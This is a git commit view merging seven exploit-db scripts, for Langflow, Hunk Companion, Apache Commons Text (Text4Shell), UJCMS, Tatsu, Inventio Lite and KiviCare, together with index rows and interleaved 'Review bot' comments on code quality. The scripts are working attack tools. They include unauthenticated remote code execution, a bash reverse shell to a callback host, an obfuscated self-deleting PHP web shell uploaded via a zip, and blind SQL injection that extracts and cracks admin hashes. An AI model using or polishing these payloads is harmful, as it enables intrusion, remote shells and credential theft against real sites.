Merge remote-tracking branch 'exploitdb/main'

This commit is contained in:
Brendan McDevitt 2025-04-20 00:02:46 +00:00
commit 2d562cdb73
8 changed files with 770 additions and 0 deletions


@ -0,0 +1,107 @@
# Exploit Title: Langflow 1.3.0 - Remote Code Execution (RCE)
# Date: 2025-04-17
# Exploit Author: VeryLazyTech
# Vendor Homepage: http://www.langflow.org/
# Software Link: https://github.com/langflow-ai/langflow
# Version: Langflow < 1.3.0
# Tested on: Windows Server 2019
# CVE: CVE-2025-3248
# CVE-2025-3248 - Remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code
# FOFA "Langflow"
# Medium: https://medium.com/@verylazytech
# GitHub: https://github.com/verylazytech
# Shop: https://shop.verylazytech.com
# Website: https://www.verylazytech.com
import argparse
import requests
import json
from urllib.parse import urljoin
import random
from colorama import init, Fore, Style
# Disable SSL warnings
requests.packages.urllib3.disable_warnings()
# Initialize colorama
init(autoreset=True)
# Constants
ENDC = "\033[0m"
ENCODING = "UTF-8"
COLORS = [Fore.GREEN, Fore.CYAN, Fore.BLUE]
def banner():
random_color = random.choice(COLORS)
return f"""{Style.BRIGHT}{random_color}
______ _______ ____ ___ ____ ____ _________ _ _ ___
/ ___\ \ / / ____| |___ \ / _ \___ \| ___| |___ /___ \| || | ( _ )
| | \ \ / /| _| __) | | | |__) |___ \ |_ \ __) | || |_ / _ \
| |___ \ V / | |___ / __/| |_| / __/ ___) | ___) / __/|__ _| (_) |
\____| \_/ |_____| |_____|\___/_____|____/ |____/_____| |_| \___/
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
{Style.BRIGHT}{Fore.WHITE}@VeryLazyTech - Medium {Style.RESET_ALL}\n
{Style.RESET_ALL}
"""
print(banner())
class LangflowScanner:
def __init__(self, url, timeout=10):
self.url = url.rstrip('/')
self.timeout = timeout
self.session = requests.Session()
self.session.verify = False
self.session.headers.update({
'User-Agent': 'Mozilla/5.0',
'Content-Type': 'application/json',
'Accept': 'application/json',
})
def exploit(self, command):
endpoint = urljoin(self.url, '/api/v1/validate/code')
payload = {
"code": f"""
def run(cd=exec('raise Exception(__import__("subprocess").check_output("{command}", shell=True))')): pass
"""
}
try:
print(f"{Fore.YELLOW}[*] Sending payload to {endpoint}")
response = self.session.post(endpoint, json=payload, timeout=self.timeout)
print(f"{Fore.YELLOW}[*] Status Code: {response.status_code}")
print(f"{Fore.YELLOW}[*] Raw Response: {response.text}")
if response.status_code == 200:
try:
data = response.json()
error_msg = data.get("function", {}).get("errors", [""])[0]
if isinstance(error_msg, str) and error_msg.startswith("b'"):
output = error_msg[2:-1].encode().decode('unicode_escape').strip()
return output
except Exception as e:
return f"[!] Failed to parse response: {str(e)}"
return f"[!] Exploit failed with status {response.status_code}"
except requests.RequestException as e:
return f"[!] Request failed: {str(e)}"
def main():
parser = argparse.ArgumentParser(description="Langflow CVE-2025-3248 Exploit")
parser.add_argument("url", help="Target base URL (e.g., http://host:port)")
parser.add_argument("cmd", help="Command to execute (e.g., whoami)")
args = parser.parse_args()
scanner = LangflowScanner(args.url)
result = scanner.exploit(args.cmd)
print(f"{Fore.GREEN}[+] Command Output:\n{result}")
if __name__ == "__main__":
main()
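Review bot: `ENDC` and `ENCODING` (L36–L37) are never referenced, and `print(banner())` at L56 runs at import time, so merely importing the module for analysis prints the banner as a side effect; drop the two constants and call `print(banner())` from `main()` instead. `exploit()` catches a bare `Exception` around the JSON parsing (L87) and returns a message string for it, so a caller cannot tell a successful run from a parse failure by type — at minimum document the contract with `"""Return the decoded command output on success, or a '[!]'-prefixed message string on any failure."""`. The index row added at L692 registers 52262 as `exploits/multiple/remote/52262.txt`; if this section is that file, the content is a Python script and the extension should presumably be `.py`, as for the other entries in this commit.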


@ -0,0 +1,65 @@
# Exploit Title: Hunk Companion Plugin 1.9.0 - Unauthenticated Plugin Installation
# Date: 16 December, 2024
# Exploit Author: Jun Takemura
# Author's GitHub: https://github.com/JunTakemura
# Author's Blog: juntakemura.dev
# Vendor Homepage: https://themehunk.com
# Software Link: https://wordpress.org/plugins/hunk-companion/
# Version: Tested on Hunk Companion 1.8.8
# CVE: CVE-2024-11972
# Vulnerability Description:
# Exploits a flaw in the Hunk Companion plugin's permission_callback for the
# /wp-json/hc/v1/themehunk-import endpoint, allowing unauthenticated attackers
# to install and activate arbitrary plugins from the WordPress.org repository.
# Tested on: Ubuntu
# Original vulnerability discovered by: Daniel Rodriguez
#
# Usage:
# 1. Update `target_url` below with the target WordPress site's URL.
# 2. Update `plugin_name` with the slug of the plugin you want to install.
# 3. Run: python3 exploit.py
#
import requests
from urllib.parse import urljoin
# Update 'URL' with your target WordPress site URL, for example "http://localhost/wordpress"
target_url = "URL"
# Update 'NAME' with desired plugin's name (slug), for example "wp-query-console"
plugin_name = "NAME"
endpoint = "/wp-json/hc/v1/themehunk-import"
url = urljoin(target_url, endpoint)
payload = {
"params": {
"plugin": {
plugin_name: "Plugin Label"
},
"allPlugins": [
{
plugin_name: f"{plugin_name}/{plugin_name}.php"
}
],
"themeSlug": "theme",
"proThemePlugin": "plugin",
"templateType": "free",
"tmplFreePro": "theme",
"wpUrl": target_url
}
}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64)",
"Content-Type": "application/json"
}
try:
response = requests.post(url, json=payload, headers=headers, timeout=10)
response.raise_for_status() # Raises an HTTPError if the response is not 2xx
print(f"[+] Exploit sent successfully.")
print(f"Response Status Code: {response.status_code}")
print(f"Response Body: {response.text}")
except requests.exceptions.RequestException as e:
print(f"[-] Request failed: {e}")
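Review bot: The header states the version two different ways — `Hunk Companion Plugin 1.9.0` in the title and `Tested on Hunk Companion 1.8.8` at L113 — so a reader cannot tell whether 1.9.0 is the last vulnerable release or the fixed one; give the affected range and the fixing release in a single `# Version:` line. `print(f"[+] Exploit sent successfully.")` at L159 is an f-string with no placeholders and should be a plain string. The `# Raises an HTTPError if the response is not 2xx` comment at L158 restates the method name and can be removed.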


@ -0,0 +1,58 @@
# Exploit Title: Apache Commons Text 1.10.0 - Remote Code Execution
(Text4Shell - POST-based)
# Date: 2025-04-17
# Exploit Author: Arjun Chaudhary
# Vendor Homepage: https://commons.apache.org/proper/commons-text/
# Software Link:https://repo1.maven.org/maven2/org/apache/commons/commons-text/
# Version: Apache Commons Text < 1.10.0
# Tested on: Ubuntu 20.04 (Docker container), Java 11+, Apache Commons Text 1.9
# CVE: CVE-2022-42889
# Type: Remote Code Execution (RCE)
# Method: POST request, script interpolator
# Notes: This exploit demonstrates an RCE vector via POST data, differing
from common GET-based payloads.
#!/usr/bin/env python3
import urllib.parse
import http.client
import sys
def usage():
print("Usage: python3 text4shell.py <target_ip> <callback_ip> <callback_port>")
print("Example: python3 text4shell.py 127.0.0.1 192.168.22.128 4444")
sys.exit(1)
if len(sys.argv) != 4:
usage()
target_ip = sys.argv[1]
callback_ip = sys.argv[2]
callback_port = sys.argv[3]
raw_payload = (
f"${{script:javascript:var p=java.lang.Runtime.getRuntime().exec("
f"['bash','-c','bash -c \\'exec bash -i >& /dev/tcp/{callback_ip}/{callback_port} 0>&1\\''])}}"
)
encoded_payload = urllib.parse.quote(raw_payload)
path = f"/?data={encoded_payload}" # modify the parameter according to your target
print(f"[!] Remember to modify the parameter according to your target")
print(f"[+] Target: http://{target_ip}{path}")
print(f"[+] Payload (decoded): {raw_payload}")
conn = http.client.HTTPConnection(target_ip, 80)
conn.request("POST", path, body="", headers={
"Host": target_ip,
"Content-Type": "application/json",
"Content-Length": "0"
})
response = conn.getresponse()
print(f"[+] Response Status: {response.status}")
print(response.read().decode())
conn.close()
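Review bot: The `#!/usr/bin/env python3` line at L181 sits below the header comments, so it is an ordinary comment and the file is not directly executable; move it to line 1 if the shebang is intended. The header (L178–L180) describes a POST-based vector, but the payload is carried in the query string (`path = f"/?data={encoded_payload}"`, L199) and the request body is empty (`body=""`, L204) — the header should say so, since it determines whether a defender would find the string in access logs or in captured request bodies. Unless L169 and L180 are rendering wraps of longer comment lines, they are un-commented continuation lines and the file would not parse; the original should be checked for a missing `# ` on each. `print(f"[!] Remember ...")` at L200 is an f-string with no placeholders, and the hard-coded port in `HTTPConnection(target_ip, 80)` at L203 is not mentioned in `usage()`.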


@ -0,0 +1,61 @@
# Exploit Title: UJCMS 9.6.3 User Enumeration via IDOR
# Exploit Author: Cyd Tseng
# Date: 11 Dec 2024
# Category: Web application
# Vendor Homepage: https://dromara.org/
# Software Link: https://github.com/dromara/ujcms
# Version: UJCMS 9.6.3
# Tested on: Linux
# CVE: CVE-2024-12483
# Advisory: https://github.com/cydtseng/Vulnerability-Research/blob/main/ujcms/IDOR-UsernameEnumeration.md
"""
An Insecure Direct Object Reference (IDOR) vulnerability was discovered in UJCMS version 9.6.3 that allows unauthenticated enumeration of usernames through the manipulation of the user id parameter in the /users/id endpoint. While the user IDs are generally large numbers (e.g., 69278363520885761), with the exception of the admin and anonymous account, unauthenticated attackers can still systematically discover usernames of existing accounts.
"""
import requests
from bs4 import BeautifulSoup
import time
import re
BASE_URL = 'http://localhost:8080/users/{}' # Modify as necessary!
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
def fetch_user_data(user_id):
url = BASE_URL.format(user_id)
try:
response = requests.get(url, headers=HEADERS)
if response.status_code == 200:
soup = BeautifulSoup(response.content, 'html.parser')
title = soup.title.string.strip()
if title.lower() != '404':
username = re.sub(r' - UJCMS演示站$', '', title)
return user_id, username
return None
except requests.RequestException as e:
print(f"Error fetching data for user ID {user_id}: {e}")
return None
def user_id_generator(start, end):
for user_id in range(start, end + 1):
yield user_id
def enumerate_users(start_id, end_id):
for user_id in user_id_generator(start_id, end_id):
user_data = fetch_user_data(user_id)
if user_data:
print(f"Valid user found: ID {user_data[0]} with username '{user_data[1]}'")
time.sleep(0.1)
if __name__ == '__main__':
start_id = int(input("Enter the starting user ID: "))
end_id = int(input("Enter the ending user ID: "))
print(f"Starting enumeration from ID {start_id} to {end_id}...")
enumerate_users(start_id, end_id)
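Review bot: `user_id_generator` (L254–L256) is a one-line wrapper around `range(start, end + 1)` and adds nothing; `enumerate_users` can iterate `range(start_id, end_id + 1)` directly. `fetch_user_data` has no docstring and returns either a `(user_id, username)` tuple or `None`, which the caller indexes positionally at L261 — add `"""Return (user_id, username) for an existing account, or None if the page is a 404 or the request fails."""`. The function both prints the error and returns `None` on `RequestException` (L251–L253), mixing reporting with the return value; a comment stating that `None` covers both "not found" and "request failed" would make that ambiguity explicit to the caller.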

194
exploits/php/webapps/52260.py Executable file

@ -0,0 +1,194 @@
# Exploit Title:Tatsu 3.3.11 - Unauthenticated RCE
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# Product: Tatsu wordpress plugin <= 3.3.11
# CVE: CVE-2021-25094
# URL: https://tatsubuilder.com/
import sys
import requests
import argparse
import urllib3
import threading
import time
import base64
import queue
import io
import os
import zipfile
import string
import random
from datetime import datetime
urllib3.disable_warnings()
class HTTPCaller():
def __init__(self, url, headers, proxies, cmd):
self.url = url
self.headers = headers
self.proxies = proxies
self.cmd = cmd
self.encodedCmd = base64.b64encode(cmd.encode("utf8"))
self.zipname = None
self.shellFilename = None
if self.url[-1] == '/':
self.url = self.url[:-1]
if proxies:
self.proxies = {"http" : proxies, "https" : proxies}
else:
self.proxies = {}
def generateZip(self, compressionLevel, technique, customShell, keep):
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED, False,
compressionLevel) as zipFile:
if technique == "custom" and customShell and os.path.isfile(customShell):
with open(customShell) as f:
shell = f.readlines()
shell = "\n".join(shell)
self.shellFilename = os.path.basename(customShell)
if self.shellFilename[0] != ".":
self.shellFilename = "." + self.shellFilename
zipFile.writestr(self.shellFilename, shell)
elif technique == "php":
# a lazy obfuscated shell, basic bypass Wordfence
# i would change base64 encoding for something better
shell = "<?php "
shell += "$f = \"lmeyst\";"
shell += "@$a= $f[4].$f[3].$f[4].$f[5].$f[2].$f[1];"
shell += "@$words = array(base64_decode($_POST['text']));"
shell += "$j=\"array\".\"_\".\"filter\";"
shell += "@$filtered_words = $j($words, $a);"
if not keep:
shell += "@unlink(__FILE__);"
self.shellFilename = "." +
(''.join(random.choice(string.ascii_lowercase) for i in range(5))) + ".php"
zipFile.writestr(self.shellFilename, shell)
elif technique.startswith("htaccess"):
# requires AllowOverride All in the apache config file
shell = "AddType application/x-httpd-php .png\n"
zipFile.writestr(".htaccess", shell)
shell = "<?php "
shell += "$f = \"lmeyst\";"
shell += "@$a= $f[4].$f[3].$f[4].$f[5].$f[2].$f[1];"
shell += "@$words = array(base64_decode($_POST['text']));"
shell += "$j=\"array\".\"_\".\"filter\";"
shell += "@$filtered_words = $j($words, $a);"
if not keep:
shell += "@unlink('.'+'h'+'t'+'a'+'cc'+'e'+'ss');"
shell += "@unlink(__FILE__);"
self.shellFilename = "." +
(''.join(random.choice(string.ascii_lowercase) for i in range(5))) + ".png"
zipFile.writestr(self.shellFilename, shell)
else:
print("Error: unknow shell technique %s" % technique)
sys.exit(1)
self.zipname = ''.join(random.choice(string.ascii_lowercase) for i in
range(3))
self.zipFile = buffer
def getShellUrl(self):
return "%s/wp-content/uploads/typehub/custom/%s/%s" % (self.url,
self.zipname, self.shellFilename)
def executeCmd(self):
return requests.post(url = self.getShellUrl(), data = {"text":
self.encodedCmd}, headers = self.headers, proxies = self.proxies,
verify=False)
def upload(self):
url = "%s/wp-admin/admin-ajax.php" % self.url
files = {"file": ("%s.zip" % self.zipname, self.zipFile.getvalue())}
return requests.post(url = url, data = {"action": "add_custom_font"},
files = files, headers = self.headers, proxies = self.proxies, verify=False)
def main():
description = "|=== Tatsudo: pre-auth RCE exploit for Tatsu wordpress
plugin <= 3.3.8\n"
description += "|=== CVE-2021-25094 / Vincent MICHEL (@darkpills)"
print(description)
print("")
parser = argparse.ArgumentParser()
parser.add_argument("url", help="Wordpress vulnerable URL (example:
https://mywordpress.com/)")
parser.add_argument("cmd", help="OS command to execute")
parser.add_argument('--technique', help="Shell technique: php | htaccess |
custom", default="php")
parser.add_argument('--customShell', help="Provide a custom PHP shell file
that will take a base64 cmd as $_POST['text'] input")
parser.add_argument('--keep', help="Do not auto-destruct the uploaded PHP
shell", default=False, type=bool)
parser.add_argument('--proxy', help="Specify and use an HTTP proxy
(example: http://localhost:8080)")
parser.add_argument('--compressionLevel', help="Compression level of the
zip file (0 to 9, default 9)", default=9, type=int)
args = parser.parse_args()
# Use web browser-like header
headers = {
"X-Requested-With": "XMLHttpRequest",
"Origin": args.url,
"Referer": args.url,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/90.0.4430.212 Safari/537.36",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.9"
}
caller = HTTPCaller(args.url, headers, args.proxy, args.cmd)
print("[+] Generating a zip with shell technique '%s'" % args.technique)
caller.generateZip(args.compressionLevel, args.technique,
args.customShell, args.keep)
print("[+] Uploading zip archive to
%s/wp-admin/admin-ajax.php?action=add_custom_font" % (args.url))
r = caller.upload()
if (r.status_code != 200 or not r.text.startswith('{"status":"success"')):
print("[!] Got an unexpected HTTP response: %d with content:\n%s" %
(r.status_code, r.text))
print("[!] Exploit failed!")
sys.exit(1)
print("[+] Upload OK")
print("[+] Trigger shell at %s" % caller.getShellUrl())
r = caller.executeCmd()
if (r.status_code != 200):
print("[!] Got an unexpected HTTP response: %d with content:\n%s" %
(r.status_code, r.text))
print("[!] Exploit failed!")
sys.exit(1)
print("[+] Exploit success!")
print(r.text)
if args.keep:
print("[+] Call it with:")
print('curl -X POST -d"text=$(echo "{0}" | base64 -w0)"
{1}'.format(args.cmd, caller.getShellUrl()))
else:
print("[+] Shell file has been auto-deleted but parent directory will
remain on the webserver")
print("[+] Job done")
if __name__ == '__main__':
main()
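Review bot: `--keep` is declared with `type=bool` at L387–L388, and `bool("False")` is `True` for any non-empty string, so `--keep False` turns the option on; use `parser.add_argument('--keep', action="store_true", help="Do not auto-destruct the uploaded PHP shell")` instead. The banner at L374–L375 says `plugin <= 3.3.8` while the header says `<= 3.3.11` (L280) and the title says 3.3.11; the three should agree. `HTTPCaller` and its methods carry no docstrings; at minimum document that `generateZip` sets `self.zipFile`, `self.zipname` and `self.shellFilename` as side effects that `getShellUrl` and `upload` read afterwards, so calling them out of order fails. Several statements appear split across two lines (e.g. L336–L337, L352–L353, L358–L359); if those are not rendering wraps they are syntax errors and the original should be checked.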

124
exploits/php/webapps/52263.py Executable file

@ -0,0 +1,124 @@
# Exploit Title: Inventio Lite 4 - SQL Injection
Error Based SQLi in "username" parameter on "/?action=processlogin."
# Date: 08/21/2024
# Exploit Author: pointedsec
# Vendor Homepage: http://evilnapsis.com
# Software Link: https://github.com/evilnapsis/inventio-lite
# Version: < 4
# Tested on: Linux, Windows
# CVE : CVE-2024-44541
# This scripts exploit this vulnerability, extracting the hashes from database and tries to decrypt it.
# The passwords are hashed like this: $pass = sha1(md5($_POST['password']));
import requests
import signal
from pwn import *
BASE_URL = "http://192.168.1.51/inventio-lite/"
PWD_DIC_PATH = "/usr/share/wordlists/rockyou.txt"
LOGIN_ACTION = BASE_URL + "?action=processlogin"
# Handling Ctrl + C
def def_handler(x,y):
log.failure("Quitting...")
exit(1)
signal.signal(signal.SIGINT, def_handler)
def is_vulnerable():
log.info("Checking if target is vulnerable")
payload = {
"username": "\") \"",
"password": "\") \""
}
r = requests.post(LOGIN_ACTION, data=payload)
if (r.status_code != 200 or "Uncaught mysqli_sql_exception" in r.text):
return True
else:
return False
def get_administrator_hash(username):
prog_hash = log.progress("Extracting Admin Password Hash")
replace_payload = "\") or username LIKE '<USER>' or email LIKE '<USER>' and password LIKE '<STR>%' and is_admin=1 LIMIT 1-- -".replace("<USER>", username)
characters = "abcdefghijklmnopqrstuvwxyz0123456789" # SHA(MD5(PASSWORD)) so there are no symbols and no uppercases
admin_hash = ""
while True:
found_char = False
for char in characters:
payload = {
"username": replace_payload.replace("<STR>", admin_hash + char),
"password": "blablablbalbablalba123@"
}
try:
r = requests.post(LOGIN_ACTION, data=payload)
r.raise_for_status()
except requests.RequestException as e:
log.error(f"Request failed: {e}")
continue
if "<script>window.location='index.php?view=home';</script>" in r.text:
admin_hash += char
prog_hash.status("-> %s" % admin_hash)
found_char = True
break
if not found_char:
break
prog_hash.status("Final Admin Hash: %s" % admin_hash)
return admin_hash
def get_administrator_username():
prog_username = log.progress("Extracting Username")
replace_payload = "\") or username like '<STR>%' or email like '<STR>%' and is_admin=1 LIMIT 1-- -"
characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@."
username = ""
while True:
found_char = False
for char in characters:
payload = {
"username": replace_payload.replace("<STR>", username + char),
"password": "blablablablbalbla123@"
}
r = requests.post(LOGIN_ACTION, data=payload)
if "<script>window.location='index.php?view=home';</script>" in r.text:
username += char
prog_username.status("-> %s" % username)
found_char = True
break
if not found_char:
break
return username
def decrypt_password(admin_hash):
# Encryption is SHA1(MD5(PWD))
with open(PWD_DIC_PATH) as password_file:
for password in password_file:
password = password.strip()
md5_hash = hashlib.md5(password.encode()).hexdigest()
sha1_hash = hashlib.sha1(md5_hash.encode()).hexdigest()
if sha1_hash == admin_hash:
return password
log.error("Password not found in the dictionary.")
return None
if __name__ == "__main__":
# Check if target is vulnerable
if not is_vulnerable():
log.failure("Target not Vulnerable...")
exit(1)
log.success("Target Vulnerable!")
log.info("Dumping Administrator username...")
admin_username = get_administrator_username()
admin_hash = get_administrator_hash(admin_username)
pwd = decrypt_password(admin_hash)
log.success(f"Password Decrypted! -> {admin_username}:{pwd}")
log.info("Try to Log In with that username, if that doesn't work, try with some uppercase/lowercase combinations")
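Review bot: `hashlib` is used at L528–L529 but never imported by name; it is reachable only if `from pwn import *` (L455) happens to re-export it, so add an explicit `import hashlib`. `get_administrator_hash` wraps its request in `try/except requests.RequestException` (L487–L492) while `get_administrator_username` (L514) does not, so the two extraction loops behave differently on the same network error; use one error-handling style for both. `BASE_URL` and `PWD_DIC_PATH` (L456–L457) are hard-coded for one lab host and one local wordlist with no comment marking them as settings, unlike the other scripts in this commit. The header's "tries to decrypt it" (L451) and the name `decrypt_password` describe a wordlist comparison against an unsalted `sha1(md5())` digest, not decryption; `# dictionary attack against the unsalted sha1(md5()) hash, nothing is decrypted` would be accurate.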

154
exploits/php/webapps/52265.py Executable file

@ -0,0 +1,154 @@
# Exploit Title: KiviCare Clinic & Patient Management System (EHR) 3.6.4 - Unauthenticated SQL Injection
SQL Injection
# Google Dork: inurl:"/wp-content/plugins/kivicare-clinic-management-system/
# Date: 11/12/2024
# Exploit Author: Samet "samogod" Gözet
# Vendor Homepage: wordpress.org
# Software Link:
https://wordpress.org/plugins/kivicare-clinic-management-system/
# Version: < 3.6.5
# Tested on: Ubuntu 22.04
# CVE : CVE-2024-11728
#!/usr/bin/env python3
"""
CVE-2024-11728 - KiviCare WordPress Plugin Unauthenticated SQL Injection PoC
Author: samogod.samet.g
Description:
Proof of Concept for Unauthenticated SQL Injection vulnerability
in KiviCare WordPress Plugin <= 3.6.4.
The vulnerability exists in the tax_calculated_data AJAX action
where the visit_type[service_id]
parameter is insufficiently escaped, allowing SQL injection attacks.
Usage:
python3 CVE-2024-11728.py -u <target_url> [-t <timeout>] [-v]
"""
import argparse
import requests
import sys
import time
from urllib3.exceptions import InsecureRequestWarning
# Disable SSL warnings
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
class KiviCareExploit:
def __init__(self, url, timeout=10, verbose=False):
self.url = url.rstrip('/')
self.timeout = timeout
self.verbose = verbose
self.target = f"{self.url}/wp-admin/admin-ajax.php"
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': '*/*'
}
def log(self, message, level="info"):
"""Custom logging function"""
colors = {
"info": "\033[94m[*]",
"success": "\033[92m[+]",
"error": "\033[91m[-]",
"warning": "\033[93m[!]"
}
print(f"{colors.get(level, '[*]')} {message}\033[0m")
def verify_vulnerability(self):
"""Verify if the target is vulnerable using a time-based SQL
injection"""
self.log("Testing vulnerability with time-based SQL injection...")
data = {
'action': 'ajax_post',
'route_name': 'tax_calculated_data',
'clinic_id[id]': '1',
'doctor_id[id]': '1',
'visit_type[0][service_id]': "123) AND (SELECT * FROM
(SELECT(SLEEP(5)))alias) AND (1=1",
'_ajax_nonce': '5d77fc94cf' # You need to update this nonce value
}
try:
normal_data = {
'action': 'ajax_post',
'route_name': 'tax_calculated_data',
'clinic_id[id]': '1',
'doctor_id[id]': '1',
'visit_type[0][service_id]': "1",
'_ajax_nonce': '5d77fc94cf' # You need to update this
nonce value
}
start_time = time.time()
normal_response = requests.post(
self.target,
data=normal_data,
headers=self.headers,
verify=False,
timeout=self.timeout
)
normal_time = time.time() - start_time
if self.verbose:
self.log(f"Normal request time: {normal_time:.2f}
seconds", "info")
self.log(f"Normal response: {normal_response.text}", "info")
start_time = time.time()
try:
response = requests.post(
self.target,
data=data,
headers=self.headers,
verify=False,
timeout=self.timeout
)
elapsed_time = time.time() - start_time
if self.verbose:
self.log(f"Injection request time:
{elapsed_time:.2f} seconds", "info")
self.log(f"Request data: {data}", "info")
if elapsed_time >= 4.5:
self.log("Target appears to be vulnerable!", "success")
return True
else:
self.log("Target does not appear to be
vulnerable.", "warning")
return False
except requests.exceptions.Timeout:
self.log("Request timed out - target is vulnerable!", "success")
return True
except requests.exceptions.RequestException as e:
self.log(f"Error during vulnerability check: {str(e)}", "error")
return False
def main():
parser = argparse.ArgumentParser(description='KiviCare WordPress
Plugin Unauthenticated SQL Injection PoC (CVE-2024-11728)')
parser.add_argument('-u', '--url', required=True, help='Target URL
(e.g., http://example.com)')
parser.add_argument('-t', '--timeout', type=int, default=10,
help='Request timeout in seconds')
parser.add_argument('-v', '--verbose', action='store_true',
help='Enable verbose output')
args = parser.parse_args()
print("""
CVE-2024-11728 - KiviCare WordPress Plugin Unauthenticated SQL Injection
Author: samogod.samet.g
""")
exploit = KiviCareExploit(args.url, args.timeout, args.verbose)
exploit.verify_vulnerability()
if __name__ == '__main__':
main()
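Review bot: `normal_time` is measured at L627–L635 and only logged; the decision at L654 compares `elapsed_time` against a fixed `4.5` seconds, so the baseline request is dead code and a target whose normal round trip is already around 5 s is reported as vulnerable — either compare the difference, `if elapsed_time - normal_time >= 4.5:`, or remove the baseline request. The `_ajax_nonce` value is hard-coded at L615 and L624 with a `# You need to update this nonce value` comment, but the module docstring's Usage (L573–L574) does not mention it, so the docstring should state that the check is only meaningful with a valid nonce. The two nested `try` blocks (L617 and L641) can be a single `try` with `except requests.exceptions.Timeout` listed before `except requests.exceptions.RequestException`. `verify_vulnerability` returns a `bool` that `main()` discards at L682; use it as the process exit status or drop the return value.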


@ -11119,6 +11119,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
20491,exploits/multiple/remote/20491.txt,"KTH Kerberos 4 - Arbitrary Proxy Usage",2000-12-08,"Jouko Pynnonen",remote,multiple,,2000-12-08,2012-08-13,1,CVE-2001-0034;OSVDB-4888,,,,,https://www.securityfocus.com/bid/2090/info
46053,exploits/multiple/remote/46053.py,"Kubernetes - (Authenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,,2018-12-24,2018-12-24,0,CVE-2018-1002105,,,,,https://github.com/evict/poc_CVE-2018-1002105/blob/f704f2e593fbb686b4a5799dc13e8bfcec13f3c3/poc.py
46052,exploits/multiple/remote/46052.py,"Kubernetes - (Unauthenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,,2018-12-24,2018-12-24,0,CVE-2018-1002105,,,,,https://github.com/evict/poc_CVE-2018-1002105/blob/ed5da79aadad0049d11f89fcb9ed65f987a331a1/unauth_poc.py
52262,exploits/multiple/remote/52262.txt,"Langflow 1.3.0 - Remote Code Execution (RCE)",2025-04-18,VeryLazyTech,remote,multiple,,2025-04-18,2025-04-18,0,CVE-2025-3248,,,,,
42885,exploits/multiple/remote/42885.rb,"LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)",2017-09-27,"James Fitts",remote,multiple,,2017-09-28,2017-09-28,0,CVE-2017-6020,,,,,
39318,exploits/multiple/remote/39318.txt,"Laravel - 'Hash::make()' Password Truncation Security",2014-09-16,"Pichaya Morimoto",remote,multiple,,2014-09-16,2016-01-25,1,,,,,,https://www.securityfocus.com/bid/69849/info
36836,exploits/multiple/remote/36836.py,"Legend Perl IRC Bot - Remote Code Execution",2015-04-27,"Jay Turla",remote,multiple,,2015-04-27,2016-10-10,1,OSVDB-121681,,,,,
@ -11726,6 +11727,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49927,exploits/multiple/webapps/49927.py,"Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution",2021-06-02,"Pepe Berba",webapps,multiple,,2021-06-02,2021-06-02,0,CVE-2020-13927;CVE-2020-11978,,,,,
15710,exploits/multiple/webapps/15710.txt,"Apache Archiva 1.0 < 1.3.1 - Cross-Site Request Forgery",2010-12-09,"Anatolia Security",webapps,multiple,,2010-12-09,2010-12-09,1,CVE-2010-3449,,,,,http://www.anatoliasecurity.com/adv/as-adv-2010-001.txt
12689,exploits/multiple/webapps/12689.txt,"Apache Axis2 Administration Console - (Authenticated) Cross-Site Scripting",2010-05-21,"Richard Brain",webapps,multiple,,2010-05-20,2016-12-19,0,OSVDB-64844;CVE-2010-2103,,,,,
52261,exploits/multiple/webapps/52261.py,"Apache Commons Text 1.10.0 - Remote Code Execution",2025-04-18,"Arjun Chaudhary",webapps,multiple,,2025-04-18,2025-04-18,0,CVE-2022-42889,,,,,
46406,exploits/multiple/webapps/46406.txt,"Apache CouchDB 2.3.0 - Cross-Site Scripting",2019-02-18,"Ozer Goker",webapps,multiple,,2019-02-18,2019-02-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comapache-couchdb-2.3.0.tar.gz,
46595,exploits/multiple/webapps/46595.txt,"Apache CouchDB 2.3.1 - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-25,"Ozer Goker",webapps,multiple,,2019-03-25,2019-03-25,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comapache-couchdb-2.3.1.tar.gz,
46595,exploits/multiple/webapps/46595.txt,"Apache CouchDB 2.3.1 - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-25,"Ozer Goker",webapps,multiple,,2019-03-25,2019-03-25,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comapache-couchdb-2.3.1.tar.gz,
@ -12006,6 +12008,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
